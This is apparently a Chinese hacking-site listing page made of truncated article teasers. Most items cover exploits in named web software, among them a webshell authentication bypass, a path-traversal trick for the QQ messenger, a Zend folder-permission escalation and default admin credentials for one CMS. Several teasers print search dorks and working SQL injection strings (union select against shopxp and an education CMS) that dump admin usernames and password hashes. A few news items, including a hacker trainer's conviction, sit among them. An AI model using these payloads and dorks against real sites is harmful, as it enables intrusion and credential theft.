国内著名黑客教头获刑5年 曾提供黑客软件牟利
掌管“黑基网”为吸引收费会员 为网站牟利授意员工上传“黑客软件”供客户下载 黑客教头终审判5年 本报讯 记者今日获悉,黑基网(原黑客基地)负责人王献冰及讲师周林亮,因犯提供侵入、非法控制计算机信息系统的程序、工具罪,分别被一中院终审判处有期徒刑5年和4年。 这起牵涉到国内最著名黑客教头的案件,也是刑法修正(七)出台后,本市审理的首例涉及该罪名的案件。 现年37岁的王献冰曾被奉为国内网...
Phpspy 2011继续身份验证绕过漏洞
Author: Tm3yShell7 官方目前下载已经修补上了 目前官方下载是2011.php, 文件名为2011ok.php的是带洞版本。 今天m0r5和我说phpspy2011 我都不知道2011出来了 - - 就下下来看看 发现2011有不少借鉴WSO Shell的地方,看到$pass还是在那个函数的上面,但是验证成功过后用了一个Location重定向了一下,之后会再次检查一次cookie...
Asp限制IP访问 阻止某一个IP段禁止访问本站的代码
<% ''获取访问者的地址 ip=Request.ServerVariables("REMOTE_ADDR") ''允许的IP地址段为10.0.0.0~10.68.63.255 allowip1="10.0.0.0" allowip2="10.68.10.71" response.writecheckip(ip,allowip1,allowip2) functionchecki...
良精企业通用建站系统漏洞总汇
一,SQl注入漏洞 1,典型的Cookies注入 漏洞文件:Shownews.asp 问题代码:id=cstr(request("id")) Set rsnews=Server.CreateObject("ADODB.RecordSet") sql="update news set hits=hits+1 where id="&id conn.execute sql sql="select * f...
actcms网站管理系统漏洞0day
漏洞版本:actcms3.0以下版本 默认后台路径:admin/ 默认数据库:App_Data/DataBase.mdb 默认账户:admin 默认密码: admin 利用点:FCK编译器 漏洞界面: admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffck...
shopxp网上购物系统 v7.4 SQL注入漏洞
关键字:inurl:shopxp_news.asp 注入代码:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin 爆出用户名和密码 注意:用户名和密码是连在一起的,后十六位是密码MD5加密 adminb148...
某教育程序打印页面漏洞批量注射(附小工具)
某教育程序打印页面漏洞批量注射 inurl:info_Print.asp?ArticleID= 后台: ad_login.asp exp: union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 为了方便我编了一个...
腾讯TM、QQ远程命令执行漏洞 点开QQ消息 执行本地文件命令!
当用户发送此类格式“网址”的时候: www.webshell.cc..\..\..\..\..\..\..\Windows\System32\cmd.exe 对方接收之后,点击鼠标左键打开该网址的时候,会被当成路径打开,从而可以恶意执行一些程序、系统命令,造成严重安全隐患。 漏洞原理很简单,不解释了…… 条件如下: 1、不能 url 编码,只能明文,囧rz…… 2、不能...
暗黑3疑似遭黑客攻击 玩家被洗劫一空
《暗黑破坏神3》自15日发售以来至今已有一周多的时间,由于网络链接质量和错误代码的频繁出现让玩家们对本作抱怨不已,但就在此时有些玩家称自己的游戏帐号被盗了…… 日前,据国外媒体报道称,由于游戏安全性问题现已发现多宗《暗黑3》帐户被盗。据介绍,此事件发生在上周日的下午约4点时,一些玩家登陆游戏时出现错误33和33007的代码,但就在重新登陆游戏后,却发现自己游戏中的各种物品和金...
通过Zend目录权限不严获取执行权限
服务器上很多都装了 Zend 就算 C:\Program Files 设置过权限,安装Zend后,Zend 会自动配置目录的权限 C:\Program Files\Zend\ZendOptimizer-3.3.0 下的目录权限为 Everyone 全权,这导致入侵者能写入文件。 如果黑客入侵一个服务器,只支持 asp,或php,没有执行权限,执行组件也给禁用了,只有读写文件的权限(只要读写权限就够...